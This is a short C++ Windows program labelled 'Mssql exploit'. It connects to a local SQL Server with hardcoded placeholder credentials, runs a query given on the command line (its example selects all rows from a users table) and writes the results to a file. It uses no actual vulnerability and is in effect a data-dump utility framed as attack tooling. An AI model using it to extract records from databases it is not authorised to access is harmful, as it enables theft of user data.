#include "stdafx.h"
#include <windows.h>
#include <stdlib.h>
#include <direct.h>
#include <iostream> 
#include <fstream>
#include <string>
#include <vector>

 

#import "c:\Program Files\Common Files\System\ado\msado15.dll"  no_namespace rename("EOF","EndOfFile")



int main(int argc, char* argv[])
{
	printf("[*]Mssql exploit \n");


 
	char* strSql=argv[1];   //"SELECT  *  from  test.dbo.users";
	char* strFile=argv[2];  //"d.txt";
	int   nSize=atoi(argv[3]);    //3;
    
	std::ofstream  log;
	log.open(strFile,std::ios_base::app);

	
    ::CoInitialize(NULL);
	
	_RecordsetPtr m_pRecordset("ADODB.Recordset");
    _ConnectionPtr m_pConnection("ADODB.Connection");
	
    _bstr_t bstrSQL(strSql); 
	
	try
    {
		
        m_pConnection.CreateInstance("ADODB.Connection");
        _bstr_t strConnect = "Provider=SQLOLEDB; Server=127.0.0.1;Database=sa; uid=user; pwd=pass;";
        m_pConnection->Open(strConnect, "", "", adModeUnknown);
		
		printf("[+]Connect server succeed!!! \n");
        if (m_pConnection == NULL)
        {
            printf("Lind data ERROR!\n");
        }
		m_pRecordset.CreateInstance(__uuidof(Recordset));
		m_pRecordset->Open(bstrSQL, m_pConnection.GetInterfacePtr(), adOpenDynamic, adLockOptimistic, adCmdText);
		
	
	   
		
		
		_variant_t PactNumber, OrigCount,username;
		while (!m_pRecordset->EndOfFile)
        {
			_variant_t varTmp;
			char  strData[2048]={0};
			_bstr_t bstrData = "";  
			for (long j = 0; j < nSize; j++)  
			{  
				
				varTmp = m_pRecordset ->GetCollect(_variant_t(j)); 
				if (j > 0){  
					bstrData += ",";  
				}  
				bstrData+="\""+ _bstr_t(varTmp)+"\"";  
				
				
				
			}
			log  <<(char*)(_bstr_t)bstrData<<"\n";
			//printf("%s \n",(char*)(_bstr_t)bstrData);
			m_pRecordset->MoveNext();
			
			
		}
		m_pRecordset->Close();
		log.close();
		
		
    }
	catch (_com_error e)
    {
        
		printf("Error message: %s",(char*)e.Description());
    }
	
    if (m_pConnection->State)
    {
        m_pConnection->Close();
    }
	
    ::CoUninitialize();
	
    
    
    return 0;
	
	
 
	
	
	
	
}
